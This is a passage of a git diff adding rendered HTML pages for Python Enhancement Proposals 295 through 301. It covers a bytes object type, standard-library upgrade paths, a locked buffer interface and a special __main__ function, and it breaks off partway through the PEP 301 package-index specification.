+limona, banana
+"""
+
+def g():
+  "This is \
+string"
+
+
+

Alternatively, stripping can be done with library routines at runtime (as pydoc does), but this decreases program readability.

+
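For comparison, today's standard library already offers such runtime stripping; a sketch in modern Python (not part of this proposal):

import inspect
import textwrap

def f():
    """
    la-la-la
    limona, banana
    """

# inspect.cleandoc strips the margin the way pydoc does:
print(repr(inspect.cleandoc(f.__doc__)))  # 'la-la-la\nlimona, banana'

# textwrap.dedent removes only the common leading whitespace:
print(repr(textwrap.dedent(f.__doc__)))   # '\nla-la-la\nlimona, banana\n'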
+
+

Implementation

+

I’ll say nothing about CPython, Jython or Python.NET.

+

In original Python, there is no information about the current indentation (in spaces) at compile time, so space and tab stripping should be done at parse time. Currently no flags can be passed to the parser in program text (like from __future__ import xxx). I suggest enabling or disabling this feature at Python compile time, depending on the CPP flag Py_PARSE_MULTILINE_STRINGS.

+
+
+

Alternatives

+

The new interpretation of string constants can be implemented with ‘i’ and ‘o’ prefix flags on string constants, like:

+
i"""
+SELECT * FROM car
+WHERE model = 'i525'
+""" is in new style,
+
+o"""SELECT * FROM employee
+WHERE birth < 1982
+""" is in old style, and
+
+"""
+SELECT employee.name, car.name, car.price FROM employee, car
+WHERE employee.salary * 36 > car.price
+""" is in new style after Python-x.y.z and in old style otherwise.
+
+
+

This feature can also be disabled if the string is raw, i.e. if the ‘r’ flag is specified.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0295.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0296/index.html b/pep-0296/index.html new file mode 100644 index 00000000000..4113926d36b --- /dev/null +++ b/pep-0296/index.html @@ -0,0 +1,440 @@ + + + + + + + + PEP 296 – Adding a bytes Object Type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 296 – Adding a bytes Object Type

+
+
Author:
+
Scott Gilbert <xscottg at yahoo.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
12-Jul-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Notice

+

This PEP is withdrawn by the author (in favor of PEP 358).

+
+
+

Abstract

+

This PEP proposes the creation of a new standard type and builtin +constructor called ‘bytes’. The bytes object is an efficiently +stored array of bytes with some additional characteristics that +set it apart from several implementations that are similar.

+
+
+

Rationale

+

Python currently has many objects that implement something akin to the bytes object of this proposal. For instance the standard string, buffer, array, and mmap objects are all very similar in some regards to the bytes object. Additionally, several significant third party extensions have created similar objects to try to fill similar needs. Frustratingly, each of these objects is too narrow in scope and is missing critical features that would make it applicable to a wider category of problems.

+
+
+

Specification

+

The bytes object has the following important characteristics:

+
    +
1. Efficient underlying array storage via the standard C type “unsigned char”. This allows fine-grained control over how much memory is allocated. With the alignment restrictions designated in the next item, it is trivial for low-level extensions to cast the pointer to a different type as needed.

    Also, since the object is implemented as an array of bytes, it is +possible to pass the bytes object to the extensive library of +routines already in the standard library that presently work with +strings. For instance, the bytes object in conjunction with the +struct module could be used to provide a complete replacement for +the array module using only Python script.

    +

    If an unusual platform comes to light, one where there isn’t a +native unsigned 8 bit type, the object will do its best to +represent itself at the Python script level as though it were an +array of 8 bit unsigned values. It is doubtful whether many +extensions would handle this correctly, but Python script could be +portable in these cases.

    +
  2. +
  3. Alignment of the allocated byte array is whatever is promised by the +platform implementation of malloc. A bytes object created from an +extension can be supplied that provides any arbitrary alignment as +the extension author sees fit.

    This alignment restriction should allow the bytes object to be +used as storage for all standard C types - including PyComplex +objects or other structs of standard C type types. Further +alignment restrictions can be provided by extensions as necessary.

    +
  4. +
5. The bytes object implements a subset of the sequence operations provided by string/array objects, but with slightly different semantics in some cases. In particular, a slice always returns a new bytes object, but the underlying memory is shared between the two objects. This type of slice behavior has been called creating a “view”. Additionally, repetition and concatenation are undefined for bytes objects and will raise an exception. (A sketch of these view semantics in terms of the modern memoryview type appears after this list.)

    As these objects are likely to find use in high performance +applications, one motivation for the decision to use view slicing +is that copying between bytes objects should be very efficient and +not require the creation of temporary objects. The following code +illustrates this:

    +
    # create two 10 Meg bytes objects
    +b1 = bytes(10000000)
    +b2 = bytes(10000000)
    +
+# copy from part of one to another without creating a 1 Meg temporary
    +b1[2000000:3000000] = b2[4000000:5000000]
    +
    +
    +

    Slice assignment where the rvalue is not the same length as the +lvalue will raise an exception. However, slice assignment will +work correctly with overlapping slices (typically implemented with +memmove).

    +
  6. +
  7. The bytes object will be recognized as a native type by the pickle and +cPickle modules for efficient serialization. (In truth, this is +the only requirement that can’t be implemented via a third party +extension.)

    Partial solutions to address the need to serialize the data stored +in a bytes-like object without creating a temporary copy of the +data into a string have been implemented in the past. The tofile +and fromfile methods of the array object are good examples of +this. The bytes object will support these methods too. However, +pickling is useful in other situations - such as in the shelve +module, or implementing RPC of Python objects, and requiring the +end user to use two different serialization mechanisms to get an +efficient transfer of data is undesirable.

    +

    XXX: Will try to implement pickling of the new bytes object in +such a way that previous versions of Python will unpickle it as a +string object.

    +

    When unpickling, the bytes object will be created from memory +allocated from Python (via malloc). As such, it will lose any +additional properties that an extension supplied pointer might +have provided (special alignment, or special types of memory).

    +

    XXX: Will try to make it so that C subclasses of bytes type can +supply the memory that will be unpickled into. For instance, a +derived class called PageAlignedBytes would unpickle to memory +that is also page aligned.

    +

    On any platform where an int is 32 bits (most of them), it is +currently impossible to create a string with a length larger than +can be represented in 31 bits. As such, pickling to a string will +raise an exception when the operation is not possible.

    +

    At least on platforms supporting large files (many of them), +pickling large bytes objects to files should be possible via +repeated calls to the file.write() method.

    +
  8. +
  9. The bytes type supports the PyBufferProcs interface, but a bytes object +provides the additional guarantee that the pointer will not be +deallocated or reallocated as long as a reference to the bytes +object is held. This implies that a bytes object is not resizable +once it is created, but allows the global interpreter lock (GIL) +to be released while a separate thread manipulates the memory +pointed to if the PyBytes_Check(...) test passes.

    This characteristic of the bytes object allows it to be used in +situations such as asynchronous file I/O or on multiprocessor +machines where the pointer obtained by PyBufferProcs will be used +independently of the global interpreter lock.

    +

    Knowing that the pointer can not be reallocated or freed after the +GIL is released gives extension authors the capability to get true +concurrency and make use of additional processors for long running +computations on the pointer.

    +
  10. +
  11. In C/C++ extensions, the bytes object can be created from a supplied +pointer and destructor function to free the memory when the +reference count goes to zero.

    The special implementation of slicing for the bytes object allows +multiple bytes objects to refer to the same pointer/destructor. +As such, a refcount will be kept on the actual +pointer/destructor. This refcount is separate from the refcount +typically associated with Python objects.

    +

    XXX: It may be desirable to expose the inner refcounted object as an +actual Python object. If a good use case arises, it should be possible +for this to be implemented later with no loss to backwards compatibility.

    +
  12. +
13. It is also possible to mark the bytes object as read-only; in this case it isn’t actually mutable, but it still provides the other features of a bytes object.
  14. +
15. The bytes object keeps track of the length of its data with a Python LONG_LONG type. Even though the current definition for PyBufferProcs restricts the length to be the size of an int, this PEP does not propose to make any changes there. Instead, extensions can work around this limit by making an explicit PyBytes_Check(...) call, and if that succeeds they can make a PyBytes_GetReadBuffer(...) or PyBytes_GetWriteBuffer(...) call to get the pointer and full length of the object as a LONG_LONG.

    The bytes object will raise an exception if the standard PyBufferProcs +mechanism is used and the size of the bytes object is greater than can be +represented by an integer.

    +

    From Python scripting, the bytes object will be subscriptable with longs +so the 32 bit int limit can be avoided.

    +

    There is still a problem with the len() function as it is +PyObject_Size() and this returns an int as well. As a workaround, +the bytes object will provide a .length() method that will return a long.

    +
  16. +
  17. The bytes object can be constructed at the Python scripting level by +passing an int/long to the bytes constructor with the number of bytes to +allocate. For example:
    b = bytes(100000) # alloc 100K bytes
    +
    +
    +

    The constructor can also take another bytes object. This will be useful +for the implementation of unpickling, and in converting a read-write bytes +object into a read-only one. An optional second argument will be used to +designate creation of a readonly bytes object.

    +
  18. +
  19. From the C API, the bytes object can be allocated using any of the +following signatures:
    PyObject* PyBytes_FromLength(LONG_LONG len, int readonly);
+PyObject* PyBytes_FromPointer(void* ptr, LONG_LONG len, int readonly,
    +         void (*dest)(void *ptr, void *user), void* user);
    +
    +
    +

    In the PyBytes_FromPointer(...) function, if the dest function pointer +is passed in as NULL, it will not be called. This should only be used +for creating bytes objects from statically allocated space.

    +

    The user pointer has been called a closure in other places. It is a +pointer that the user can use for whatever purposes. It will be passed to +the destructor function on cleanup and can be useful for a number of +things. If the user pointer is not needed, NULL should be passed +instead.

    +
  20. +
21. The bytes type will be a new-style class, as that seems to be where all standard Python types are headed.
  22. +
+
+
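As promised above, here is a sketch of the view slicing semantics in terms of the modern memoryview type, which serves as a stand-in for the proposed bytes object (an analogy, not the proposal itself):

# create two views over 10 Meg buffers
b1 = memoryview(bytearray(10000000))
b2 = memoryview(bytearray(10000000))

# copying between views creates no large temporary object
b1[2000000:3000000] = b2[4000000:5000000]

# mismatched slice lengths raise, as the specification requires
try:
    b1[0:10] = b2[0:5]
except ValueError:
    pass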
+

Contrast to existing types

+

The most common way to work around the lack of a bytes object has been to +simply use a string object in its place. Binary files, the struct/array +modules, and several other examples exist of this. Putting aside the +style issue that these uses typically have nothing to do with text +strings, there is the real problem that strings are not mutable, so direct +manipulation of the data returned in these cases is not possible. Also, +numerous optimizations in the string module (such as caching the hash +value or interning the pointers) mean that extension authors are on very +thin ice if they try to break the rules with the string object.

+

The buffer object seems like it was intended to address the purpose that the bytes object is trying to fulfill, but several shortcomings in its implementation [1] have made it less useful in many common cases. The buffer object made a different choice for its slicing behavior (it returns new strings instead of buffers for slicing and other operations), and it doesn’t make many of the promises on alignment or being able to release the GIL that the bytes object does.

+

Also in regards to the buffer object, it is not possible to simply replace +the buffer object with the bytes object and maintain backwards +compatibility. The buffer object provides a mechanism to take the +PyBufferProcs supplied pointer of another object and present it as its +own. Since the behavior of the other object can not be guaranteed to +follow the same set of strict rules that a bytes object does, it can’t be +used in places that a bytes object could.

+

The array module supports the creation of an array of bytes, but it does +not provide a C API for supplying pointers and destructors to extension +supplied memory. This makes it unusable for constructing objects out of +shared memory, or memory that has special alignment or locking for things +like DMA transfers. Also, the array object does not currently pickle. +Finally since the array object allows its contents to grow, via the extend +method, the pointer can be changed if the GIL is not held while using it.

+

Creating a buffer object from an array object has the same problem of +leaving an invalid pointer when the array object is resized.

+

The mmap object caters to its particular niche, but does not attempt to +solve a wider class of problems.

+

Finally, any third party extension can not implement pickling without +creating a temporary object of a standard Python type. For example, in the +Numeric community, it is unpleasant that a large array can’t pickle +without creating a large binary string to duplicate the array data.

+
+
+

Backward Compatibility

+

The only possibility for backwards compatibility problems that the author +is aware of are in previous versions of Python that try to unpickle data +containing the new bytes type.

+
+
+

Reference Implementation

+

XXX: Actual implementation is in progress, but changes are still possible +as this PEP gets further review.

+

The following new files will be added to the Python baseline:

+
Include/bytesobject.h  # C interface
+Objects/bytesobject.c  # C implementation
+Lib/test/test_bytes.py # unit testing
+Doc/lib/libbytes.tex   # documentation
+
+
+

The following files will also be modified:

+
Include/Python.h       # adding bytesmodule.h include file
+Python/bltinmodule.c   # adding the bytes type object
+Modules/cPickle.c      # adding bytes to the standard types
+Lib/pickle.py          # adding bytes to the standard types
+
+
+

It is possible that several other modules could be cleaned up and +implemented in terms of the bytes object. The mmap module comes to mind +first, but as noted above it would be possible to reimplement the array +module as a pure Python module. While it is attractive that this PEP +could actually reduce the amount of source code by some amount, the author +feels that this could cause unnecessary risk for breaking existing +applications and should be avoided at this time.

+
+
+

Additional Notes/Comments

+
    +
  • Guido van Rossum wondered whether it would make sense to be able +to create a bytes object from a mmap object. The mmap object +appears to support the requirements necessary to provide memory +for a bytes object. (It doesn’t resize, and the pointer is valid +for the lifetime of the object.) As such, a method could be added +to the mmap module such that a bytes object could be created +directly from a mmap object. An initial stab at how this would be +implemented would be to use the PyBytes_FromPointer() function +described above and pass the mmap_object as the user pointer. The +destructor function would decref the mmap_object for cleanup.
  • +
• Todd Miller notes that it may be useful to have two new functions: PyObject_AsLargeReadBuffer() and PyObject_AsLargeWriteBuffer(), which are similar to PyObject_AsReadBuffer() and PyObject_AsWriteBuffer(), but support getting a LONG_LONG length in addition to the void* pointer. These functions would allow extension authors to work transparently with bytes objects (which support LONG_LONG lengths) and most other buffer-like objects (which only support int lengths). These functions could be in lieu of, or in addition to, creating specific PyBytes_GetReadBuffer() and PyBytes_GetWriteBuffer() functions.

XXX: The author thinks this is a very good idea as it paves the way for other objects to eventually support large (64 bit) pointers, and it should only affect abstract.c and abstract.h. Should this be added above?

    +
  • +
  • It was generally agreed that abusing the segment count of the +PyBufferProcs interface is not a good hack to work around the 31 bit +limitation of the length. If you don’t know what this means, then you’re +in good company. Most code in the Python baseline, and presumably in many +third party extensions, punt when the segment count is not 1.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0296.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0297/index.html b/pep-0297/index.html new file mode 100644 index 00000000000..b6ec9088398 --- /dev/null +++ b/pep-0297/index.html @@ -0,0 +1,221 @@ + + + + + + + + PEP 297 – Support for System Upgrades | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 297 – Support for System Upgrades

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
19-Jul-2001
+
Python-Version:
+
2.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected for failure to generate significant interest.

+
+
+

Abstract

+

This PEP proposes strategies to allow the Python standard library +to be upgraded in parts without having to reinstall the complete +distribution or having to wait for a new patch level release.

+
+
+

Problem

+

Python currently does not allow overriding modules or packages in the standard library by default. Even though this is possible by defining a PYTHONPATH environment variable (the paths defined in this variable are prepended to the Python standard library path), there is no standard way of achieving this without changing the configuration.

+

Since Python’s standard library is starting to host packages which +are also available separately, e.g. the distutils, email and PyXML +packages, which can also be installed independently of the Python +distribution, it is desirable to have an option to upgrade these +packages without having to wait for a new patch level release of +the Python interpreter to bring along the changes.

+

On some occasions, it may also be desirable to update modules of +the standard library without going through the whole Python release +cycle, e.g. in order to provide hot-fixes for security problems.

+
+
+

Proposed Solutions

+

This PEP proposes two different but not necessarily conflicting +solutions:

+
    +
1. Adding a new standard search path to sys.path: $stdlibpath/system-packages just before the $stdlibpath entry. This complements the already existing entry for site add-ons, $stdlibpath/site-packages, which is appended to sys.path at interpreter startup time. (See the sketch after this list.)

    To make use of this new standard location, distutils will need +to grow support for installing certain packages in +$stdlibpath/system-packages rather than the standard location +for third-party packages $stdlibpath/site-packages.

    +
  2. +
  3. Tweaking distutils to install directly into $stdlibpath for the +system upgrades rather than into $stdlibpath/site-packages.
  4. +
+
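A rough sketch of what the two solutions would mean for the path configuration; the concrete paths are illustrative assumptions only:

import sys

stdlibpath = "/usr/lib/python2.6"  # assumed location of the stdlib

# Solution 1: a system-packages entry searched just before the stdlib.
if stdlibpath in sys.path:
    sys.path.insert(sys.path.index(stdlibpath),
                    stdlibpath + "/system-packages")

# Solution 2 needs no interpreter change: distutils would instead be
# directed to install straight into stdlibpath itself.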

The first solution has a few advantages over the second:

+
    +
  • upgrades can be easily identified (just look in +$stdlibpath/system-packages)
  • +
  • upgrades can be de-installed without affecting the rest +of the interpreter installation
  • +
• modules can be virtually removed from packages; this is due to the way Python imports packages: once it finds the top-level package directory it stays in this directory for all subsequent package submodule imports
  • +
• the approach has an overall much cleaner design than the hackish “install on top of an existing installation” approach
  • +
+

The only advantages of the second approach are that the Python interpreter does not have to be changed and that it works with older Python versions.

+

Both solutions require changes to distutils. These changes can +also be implemented by package authors, but it would be better to +define a standard way of switching on the proposed behaviour.

+
+
+

Scope

+

Solution 1: Python 2.6 and up

+

Solution 2: all Python versions supported by distutils

+
+
+

Credits

+

None

+
+
+

References

+

None

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0297.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0298/index.html b/pep-0298/index.html new file mode 100644 index 00000000000..d678c988355 --- /dev/null +++ b/pep-0298/index.html @@ -0,0 +1,325 @@ + + + + + + + + PEP 298 – The Locked Buffer Interface | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 298 – The Locked Buffer Interface

+
+
Author:
+
Thomas Heller <theller at python.net>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
26-Jul-2002
+
Python-Version:
+
2.3
+
Post-History:
+
30-Jul-2002, 01-Aug-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an extension to the buffer interface called the +‘locked buffer interface’.

+

The locked buffer interface avoids the flaws of the ‘old’ buffer +interface [1] as defined in Python versions up to and including +2.2, and has the following semantics:

+
    +
  • The lifetime of the retrieved pointer is clearly defined and +controlled by the client.
  • +
  • The buffer size is returned as a ‘size_t’ data type, which +allows access to large buffers on platforms where sizeof(int) +!= sizeof(void *).
  • +
+

(Guido comments: This second point sounds like a change we could also make to the “old” buffer interface, if we introduce another flag bit that’s not part of the default flags.)

+
+
+

Specification

+

The locked buffer interface exposes new functions which return the size of, and the pointer to, the internal memory block of any Python object which chooses to implement this interface.

+

Retrieving a buffer from an object puts this object in a locked +state during which the buffer may not be freed, resized, or +reallocated.

+

The object must be unlocked again by releasing the buffer, via a call to another function in the locked buffer interface, once the buffer is no longer used. If the object never resizes or reallocates the buffer during its lifetime, this function may be NULL. Failure to call this function (if it is != NULL) is a programming error and may have unexpected results.

+

The locked buffer interface omits the memory segment model which +is present in the old buffer interface - only a single memory +block can be exposed.

+

The memory blocks can be accessed without holding the global +interpreter lock.

+
+
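Later Pythons grew a close analogue of this locked state in the buffer machinery; the following modern sketch illustrates the semantics at the Python level (an analogy, not the proposed C interface):

ba = bytearray(b"spam")
view = memoryview(ba)  # acquire: the buffer is now pinned
try:
    ba += b"!"         # resizing while the buffer is exported...
except BufferError:
    pass               # ...fails, much like a locked mmap or array
view.release()         # the counterpart of releaselockedbufferproc
ba += b"!"             # the object may be resized again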
+

Implementation

+

Define a new flag in Include/object.h:

+
/* PyBufferProcs contains bf_acquirelockedreadbuffer,
+   bf_acquirelockedwritebuffer, and bf_releaselockedbuffer */
+#define Py_TPFLAGS_HAVE_LOCKEDBUFFER (1L<<15)
+
+
+

This flag would be included in Py_TPFLAGS_DEFAULT:

+
#define Py_TPFLAGS_DEFAULT  ( \
+                    ....
+                    Py_TPFLAGS_HAVE_LOCKEDBUFFER | \
+                    ....
+                    0)
+
+
+

Extend the PyBufferProcs structure by new fields in +Include/object.h:

+
typedef size_t (*acquirelockedreadbufferproc)(PyObject *,
+                                              const void **);
+typedef size_t (*acquirelockedwritebufferproc)(PyObject *,
+                                               void **);
+typedef void (*releaselockedbufferproc)(PyObject *);
+
+typedef struct {
+    getreadbufferproc bf_getreadbuffer;
+    getwritebufferproc bf_getwritebuffer;
+    getsegcountproc bf_getsegcount;
+    getcharbufferproc bf_getcharbuffer;
+    /* locked buffer interface functions */
+    acquirelockedreadbufferproc bf_acquirelockedreadbuffer;
+    acquirelockedwritebufferproc bf_acquirelockedwritebuffer;
+    releaselockedbufferproc bf_releaselockedbuffer;
+} PyBufferProcs;
+
+
+

The new fields are present if the Py_TPFLAGS_HAVE_LOCKEDBUFFER +flag is set in the object’s type.

+

The Py_TPFLAGS_HAVE_LOCKEDBUFFER flag implies the +Py_TPFLAGS_HAVE_GETCHARBUFFER flag.

+

The acquirelockedreadbufferproc and acquirelockedwritebufferproc functions return the size in bytes of the memory block on success, filling in the passed void * pointer. If these functions fail - either because an error occurs or no memory block is exposed - they must set the void * pointer to NULL and raise an exception. The return value is undefined in these cases and should not be used.

+

If calls to these functions succeed, eventually the buffer must be released by a call to the releaselockedbufferproc, supplying the original object as argument. The releaselockedbufferproc cannot fail. For objects that actually maintain an internal lock count it would be a fatal error if the releaselockedbufferproc function were called too often, leading to a negative lock count.

+

Similar to the ‘old’ buffer interface, any of these functions may +be set to NULL, but it is strongly recommended to implement the +releaselockedbufferproc function (even if it does nothing) if any +of the acquireread/writelockedbufferproc functions are +implemented, to discourage extension writers from checking for a +NULL value and not calling it.

+

These functions aren’t supposed to be called directly, they are +called through convenience functions declared in +Include/abstract.h:

+
int PyObject_AcquireLockedReadBuffer(PyObject *obj,
+                                    const void **buffer,
+                                    size_t *buffer_len);
+
+int PyObject_AcquireLockedWriteBuffer(PyObject *obj,
+                                      void **buffer,
+                                      size_t *buffer_len);
+
+void PyObject_ReleaseLockedBuffer(PyObject *obj);
+
+
+

The former two functions return 0 on success, set buffer to the +memory location and buffer_len to the length of the memory block +in bytes. On failure, or if the locked buffer interface is not +implemented by obj, they return -1 and set an exception.

+

The latter function doesn’t return anything, and cannot fail.

+
+
+

Backward Compatibility

+

The size of the PyBufferProcs structure changes if this proposal +is implemented, but the type’s tp_flags slot can be used to +determine if the additional fields are present.

+
+
+

Reference Implementation

+

An implementation has been uploaded to the SourceForge patch +manager as https://bugs.python.org/issue652857.

+
+
+

Additional Notes/Comments

+

Python strings, unicode strings, mmap objects, and array objects +would expose the locked buffer interface.

+

mmap and array objects would actually enter a locked state while the buffer is active; this is not needed for strings and unicode objects. Resizing locked array objects is not allowed and will raise an exception. Whether closing a locked mmap object is an error, or is merely deferred until the lock count reaches zero, is an implementation detail.

+

Guido recommends

+
+
But I’m still very concerned that if most built-in types +(e.g. strings, bytes) don’t implement the release +functionality, it’s too easy for an extension to seem to work +while forgetting to release the buffer.

I recommend that at least some built-in types implement the +acquire/release functionality with a counter, and assert that +the counter is zero when the object is deleted – if the +assert fails, someone DECREF’ed their reference to the object +without releasing it. (The rule should be that you must own a +reference to the object while you’ve acquired the object.)

+

For strings that might be impractical because the string +object would have to grow 4 bytes to hold the counter; but the +new bytes object (PEP 296) could easily implement the counter, +and the array object too – that way there will be plenty of +opportunity to test proper use of the protocol.

+
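A toy sketch of that counter idea at the Python level (CountedBuffer is a hypothetical class, for illustration only):

class CountedBuffer:
    """Track the acquire/release balance, as Guido suggests."""

    def __init__(self, data):
        self.data = bytearray(data)
        self._locks = 0

    def acquire(self):
        self._locks += 1
        return self.data

    def release(self):
        assert self._locks > 0, "release without matching acquire"
        self._locks -= 1

    def __del__(self):
        # The recommended assertion: a nonzero count here means someone
        # dropped their reference without releasing the buffer.
        assert self._locks == 0, "deleted while buffer still acquired"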
+
+
+

Community Feedback

+

Greg Ewing doubts the locked buffer interface is needed at all; he thinks the normal buffer interface could be used if the pointer is (re)fetched each time it’s used. This seems dangerous, because even innocent-looking calls to the Python API like Py_DECREF() may trigger execution of arbitrary Python code.

+

The first version of this proposal didn’t have the release +function, but it turned out that this would have been too +restrictive: mmap and array objects wouldn’t have been able to +implement it, because mmap objects can be closed anytime if not +locked, and array objects could resize or reallocate the buffer.

+

This PEP will probably be rejected because nobody except the +author needs it.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0298.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0299/index.html b/pep-0299/index.html new file mode 100644 index 00000000000..9f95e1ad554 --- /dev/null +++ b/pep-0299/index.html @@ -0,0 +1,232 @@ + + + + + + + + PEP 299 – Special __main__() function in modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 299 – Special __main__() function in modules

+
+
Author:
+
Jeff Epler <jepler at unpythonic.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
12-Aug-2002
+
Python-Version:
+
2.3
+
Post-History:
+
29-Mar-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

Many Python modules are also intended to be callable as standalone +scripts. This PEP proposes that a special function called __main__() +should serve this purpose.

+
+
+

Motivation

+

There should be one simple and universal idiom for invoking a module +as a standalone script.

+

The semi-standard idiom:

+
if __name__ == '__main__':
+    perform "standalone" functionality
+
+
+

is unclear to programmers of languages like C and C++. It also does +not permit invocation of the standalone function when the module is +imported. The variant:

+
if __name__ == '__main__':
+    main_function()
+
+
+

is sometimes seen, but there exists no standard name for the function, and because arguments are taken from sys.argv it is not possible to pass specific arguments without changing the argument list seen by all other modules. (Imagine a threaded Python program, with two threads wishing to invoke the standalone functionality of different modules with different argument lists.)

+
+
+

Proposal

+

The standard name of the ‘main function’ should be __main__. When a +module is invoked on the command line, such as:

+
python mymodule.py
+
+
+

then the module behaves as though the following lines existed at the +end of the module (except that the attribute __sys may not be used or +assumed to exist elsewhere in the script):

+
if globals().has_key("__main__"):
+    import sys as __sys
+    __sys.exit(__main__(__sys.argv))
+
+
+

Other modules may execute:

+
import mymodule
+mymodule.__main__(['mymodule', ...])
+
+
+

It is up to mymodule to document thread-safety issues or other +issues which might restrict use of __main__. (Other issues might +include use of mutually exclusive GUI modules, non-sharable resources +like hardware devices, reassignment of sys.stdin/stdout, etc)

+
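Putting the pieces together, a module written against the proposed convention might look like this (a sketch; the explicit trailer spells out what the interpreter would do implicitly under the proposal):

# mymodule.py (hypothetical)
def __main__(argv):
    print("called with", argv[1:])
    return 0  # becomes the process exit status

# what "python mymodule.py" would do implicitly under this proposal:
if __name__ == '__main__':
    import sys
    sys.exit(__main__(sys.argv))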
+
+

Implementation

+

In modules/main.c, the block near line 385 (after the +PyRun_AnyFileExFlags call) will be changed so that the above code +(or its C equivalent) is executed.

+
+
+

Open Issues

+
    +
  • Should the return value from __main__ be treated as the exit value?

Yes. Many __main__ functions will naturally return None, which sys.exit translates into a “success” return code. In those that return a numeric result, it behaves just like the argument to sys.exit() or the return value from C’s main().

    +
  • +
  • Should the argument list to __main__ include argv[0], or just the +“real” arguments argv[1:]?

    argv[0] is included for symmetry with sys.argv and easy +transition to the new standard idiom.

    +
  • +
+
+
+

Rejection

+

In a short discussion on python-dev [1], two major backwards +compatibility problems were brought up and Guido pronounced that he +doesn’t like the idea anyway as it’s “not worth the change (in docs, +user habits, etc.) and there’s nothing particularly broken.”

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0299.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0301/index.html b/pep-0301/index.html new file mode 100644 index 00000000000..48cb4dacab6 --- /dev/null +++ b/pep-0301/index.html @@ -0,0 +1,481 @@ + + + + + + + + PEP 301 – Package Index and Metadata for Distutils | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 301 – Package Index and Metadata for Distutils

+
+
Author:
+
Richard Jones <richard at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
24-Oct-2002
+
Python-Version:
+
2.3
+
Post-History:
+
08-Nov-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes several extensions to the Distutils packaging system +[1]. These enhancements include a central package index server, +tools for submitting package information to the index and extensions +to the package metadata to include Trove [2] information.

+

This PEP does not address issues of package dependency. It also does +not address storage and download of packages as described in PEP 243. +Nor is it proposing a local database of packages as described +in PEP 262.

+

Existing package repositories such as the Vaults of Parnassus [3], +CPAN [4] and PAUSE [5] will be investigated as prior art in this +field.

+
+
+

Rationale

+

Python programmers have long needed a simple method of discovering existing modules and systems available for their use. It is arguable that the existence of these systems for other languages has been a significant contribution to their popularity. The existence of the Catalog-SIG, and the many discussions there, indicates that there is a large population of users who recognise this need.

+

The introduction of the Distutils packaging system to Python +simplified the process of distributing shareable code, and included +mechanisms for the capture of package metadata, but did little with +the metadata save ship it with the package.

+

An interface to the index should be hosted in the python.org domain, +giving it an air of legitimacy that existing catalog efforts do not +have.

+

The interface for submitting information to the catalog should be as +simple as possible - hopefully just a one-line command for most users.

+

Issues of package dependency are not addressed due to the complexity +of such a system. PEP 262 proposes such a system, but as of this +writing the PEP is still unfinished.

+

Issues of package dissemination (storage on a central server) are +not addressed because they require assumptions about availability of +storage and bandwidth that I am not in a position to make. PEP 243, +which is still being developed, is tackling these issues and many +more. This proposal is considered compatible with, and adjunct to +the proposal in PEP 243.

+
+
+

Specification

+

The specification takes three parts, the web interface, the +Distutils register command and the Distutils Trove +classification.

+
+

Web Interface

+

A web interface is implemented over a simple store. The interface is +available through the python.org domain, either directly or as +packages.python.org.

+

The store has columns for all metadata fields. The (name, version) +double is used as a uniqueness key. Additional submissions for an +existing (name, version) will result in an update operation.

+

The web interface implements the following commands/interfaces:

+
+
index
Lists known packages, optionally filtered. An additional HTML page, +search, presents a form to the user which is used to customise +the index view. The index will include a browsing interface like +that presented in the Trove interface design section 4.3. The +results will be paginated, sorted alphabetically and only showing +the most recent version. The most recent version information will +be determined using the Distutils LooseVersion class.
+
display
Displays information about the package. All fields are displayed as +plain text. The “url” (or “home_page”) field is hyperlinked.
+
submit
